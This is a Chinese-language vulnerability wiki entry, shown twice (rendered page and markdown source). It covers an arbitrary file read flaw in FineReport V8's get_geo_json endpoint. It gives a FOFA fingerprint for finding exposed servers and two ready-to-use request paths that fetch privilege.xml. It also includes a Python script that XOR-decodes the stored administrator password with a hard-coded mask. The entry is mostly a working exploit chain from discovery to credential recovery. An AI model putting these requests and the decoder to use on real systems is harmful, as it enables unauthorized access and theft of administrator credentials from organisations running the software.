fofamini-wiki

登录白背景

源码

帆软报表 V8 get_geo_json 任意文件读取漏洞

一、漏洞简介

FineReport报表软件是一款纯Java编写的，集数据展示(报表)和数据录入(表单)功能于一身的企业级web报表工具。FineReport 8.0版本存在任意文件读取漏洞，攻击者可利用漏洞读取网站任意文件。

二、影响版本

FineReport < v8.0

三、资产测绘

fofabody="isSupportForgetPwd"
特征

四、漏洞复现

/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml

解密脚本


cipher = '___0072002a00670066000a' #密文
PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23] #掩码
Password = ""
cipher = cipher[3:] #截断三位后
for i in range(int(len(cipher) / 4)):
    c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16)
    c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8]
    Password = Password + chr(c2)
print (Password)

原文: https://www.yuque.com/xiaokp7/ocvun2/arybiyc5hqlio3sy

# 帆软报表 V8 get_geo_json 任意文件读取漏洞

# 一、漏洞简介
FineReport报表软件是一款纯Java编写的，集数据展示(报表)和数据录入(表单)功能于一身的企业级web报表工具。FineReport 8.0版本存在任意文件读取漏洞，攻击者可利用漏洞读取网站任意文件。

# 二、影响版本

- FineReport < v8.0

# 三、资产测绘

- fofa`body="isSupportForgetPwd"`
- 特征

![image.png](./img/GT6G6nMitDshNY6G/1713856438649-06eb167d-d167-4b7a-8c8d-8a1e8994ae3f-414424.png)

# 四、漏洞复现
```java
/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
```
![image.png](./img/GT6G6nMitDshNY6G/1713856490500-46bbb6cb-0cac-4f79-951e-c4ff5e42e104-206850.png)
解密脚本
```java

cipher = '___0072002a00670066000a' #密文
PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23] #掩码
Password = ""
cipher = cipher[3:] #截断三位后
for i in range(int(len(cipher) / 4)):
    c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16)
    c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8]
    Password = Password + chr(c2)
print (Password)
```
![image.png](./img/GT6G6nMitDshNY6G/1713856537445-562fa28c-afad-47bc-b263-09c24af3aaed-688851.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/arybiyc5hqlio3sy>